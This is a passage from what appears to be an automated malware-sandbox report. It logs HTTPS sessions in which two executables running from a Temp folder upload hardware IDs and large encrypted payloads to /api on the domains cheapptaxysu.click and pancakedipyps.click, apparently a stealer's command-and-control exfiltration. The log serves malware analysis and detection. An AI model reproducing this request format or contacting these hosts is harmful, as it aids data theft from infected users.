                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=11utgfjbbv8sf5l68747l99h10; expires=Wed, 16 Apr 2025 19:03:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0D6IOay8GMWjVVIxPIZVr822vjFBwucV7tPJpV8E2XcnSbEv82qnkKlB%2BTUW4ZJ2tzKhpRjP4VJ08ZmyI6aI5pn5V1KoRaSLXy4FfdxeWyxMn4ta1Pp9BEcKDZabF4vm%2F7wDIIt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44a1bcab0dc7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1880&min_rtt=1876&rtt_var=711&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2203&delivery_rate=1530398&cwnd=211&unsent_bytes=0&cid=814b4dd8669a15ea&ts=1090&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:16:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              8192.168.2.449844104.21.67.1464435040C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:43 UTC371OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=T2MK80ZMH719T109
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18154
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:43 UTC15331OUTData Raw: 2d 2d 54 32 4d 4b 38 30 5a 4d 48 37 31 39 54 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 32 4d 4b 38 30 5a 4d 48 37 31 39 54 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 32 4d 4b 38 30 5a 4d 48 37 31 39 54 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d
                                                                                                                                                                                                                                                              Data Ascii: --T2MK80ZMH719T109Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--T2MK80ZMH719T109Content-Disposition: form-data; name="pid"2--T2MK80ZMH719T109Content-Disposition: form-data; name="lid"CZJvss--geopoxid-
                                                                                                                                                                                                                                                              2024-12-22 01:16:43 UTC2823OUTData Raw: c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da
                                                                                                                                                                                                                                                              Data Ascii: JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                                                                                                                                                                              2024-12-22 01:16:44 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=gtetlqas5tr5t9aa7645d380mf; expires=Wed, 16 Apr 2025 19:03:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJxjiYrbxDF9uZTolWZpYTN382oY4xv8TWtv%2B084vJifGvb%2FqzUJyQ9cPmcZ88sqzhaXVCUN8vvzpi4uJ2NdLI%2BpNUqqRXQwoQCyCLtRidQlg6ormyEnlobGW%2BxajYLONMImp54%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44a1fb8a5e6d-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1761&rtt_var=673&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19205&delivery_rate=1611479&cwnd=252&unsent_bytes=0&cid=b06af9a1ebe90d0d&ts=1003&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:16:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              9192.168.2.449852104.21.67.1464435040C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC370OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=473ERRE6MXBH48JU
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8775
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC8775OUTData Raw: 2d 2d 34 37 33 45 52 52 45 36 4d 58 42 48 34 38 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 37 33 45 52 52 45 36 4d 58 42 48 34 38 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 37 33 45 52 52 45 36 4d 58 42 48 34 38 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d
                                                                                                                                                                                                                                                              Data Ascii: --473ERRE6MXBH48JUContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--473ERRE6MXBH48JUContent-Disposition: form-data; name="pid"2--473ERRE6MXBH48JUContent-Disposition: form-data; name="lid"CZJvss--geopoxid-
                                                                                                                                                                                                                                                              2024-12-22 01:16:46 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:46 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=tdmv92rb7fu5t626g1piofa8nd; expires=Wed, 16 Apr 2025 19:03:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeT4XjWMmPAz2%2BgKfqztoMs8nRmGvtj9XTSrACOuh3JU%2F3ZqUVZoDoQs6F4RVprR7d%2F4N8%2BrQaFBja%2FvsSVA2GnWP0HkqM5cFX14AypDPATTbFYVk4Hnj%2FXnLAmE7P3kTBKyT%2BI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44b1cf1dc42a-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1525&rtt_var=582&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9803&delivery_rate=1863433&cwnd=200&unsent_bytes=0&cid=c88273e15162cf15&ts=1305&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:16:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              10192.168.2.449858172.67.209.2024437820C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=LAOO87GB7Q5E3WB303C
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 549473
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: 2d 2d 4c 41 4f 4f 38 37 47 42 37 51 35 45 33 57 42 33 30 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 41 4f 4f 38 37 47 42 37 51 35 45 33 57 42 33 30 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 41 4f 4f 38 37 47 42 37 51 35 45 33 57 42 33 30 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65
                                                                                                                                                                                                                                                              Data Ascii: --LAOO87GB7Q5E3WB303CContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--LAOO87GB7Q5E3WB303CContent-Disposition: form-data; name="pid"1--LAOO87GB7Q5E3WB303CContent-Disposition: form-data; name="lid"FATE99--te
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: 61 48 51 9a 26 0c e6 69 2a c2 1b 42 f3 5f 3a 8f 6b ff 5b d9 33 82 3b 81 93 b5 ac 78 86 32 4c f7 38 95 aa 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03
                                                                                                                                                                                                                                                              Data Ascii: aHQ&i*B_:k[3;x2L8Imu6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: 41 d0 7e 60 42 36 54 f0 4d fe e2 98 7e 14 13 64 db cd c1 84 55 b6 86 b9 f3 5e ce 69 96 42 ca 47 8e e4 8b 61 de 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9
                                                                                                                                                                                                                                                              Data Ascii: A~`B6TM~dU^iBGacC|.-NKtajk&F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jK
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: a2 4c a3 f2 43 1a cf 85 04 89 13 d3 22 2d 44 86 3b ae 73 17 55 80 ce f9 e4 2a ee d6 06 6e b9 ef d5 b1 db 1b 28 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81
                                                                                                                                                                                                                                                              Data Ascii: LC"-D;sU*n(iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RA
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: 6c 22 32 cb 30 95 0e 45 ca 7c ff 10 89 d9 b2 11 c4 1e 61 f0 6b 98 94 9b ec 33 dc 37 90 f3 aa a4 ec 73 ff 34 51 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2
                                                                                                                                                                                                                                                              Data Ascii: l"20E|ak37s4Q,I=.iy|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: dc c7 7b 74 4b c7 fd 32 ea 9d 84 38 52 df 0b 1e b6 ce a3 67 9f a6 98 19 0e 4c 1c 8d d9 55 fd f7 fd 6e 0c 29 49 cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07
                                                                                                                                                                                                                                                              Data Ascii: {tK28RgLUn)ITL#}{(plm2)sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R w
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: 9c 1f b6 9e 83 c0 c8 01 ab 57 84 e5 81 0b de 7f 30 63 0a 6e ae 2c 85 5a f2 28 79 0c db fc bf 6b c7 fe e7 a8 d5 e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09
                                                                                                                                                                                                                                                              Data Ascii: W0cn,Z(yknT8!(.jrGx;<Z2'(PS4|G|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJ
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: 86 43 6a 84 7d 1f b3 ac 04 26 74 35 04 dd a4 61 1d 75 35 2d ae 9c 9d 44 3e 5a da 5c d1 db fa 64 ab f6 cd 2f 0b 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0
                                                                                                                                                                                                                                                              Data Ascii: Cj}&t5au5-D>Z\d/BJGlz;m#(aobSeL&)Dh$N]N\}am|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/
                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: 77 6c c9 a5 13 1c 27 7f 2d 73 f6 b5 36 0b 83 45 36 c2 0a 0c 3c c4 97 64 67 d3 74 70 64 93 d8 fe ff ff c4 84 33 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39
                                                                                                                                                                                                                                                              Data Ascii: wl'-s6E6<dgtpd3vs]|.kOT4V*=Og>zAoy?QwKL,.6Ed}7X 09G8*s%KcGTmg45Vq7[qv>|fTS*RyAQ pQ!A+;v9
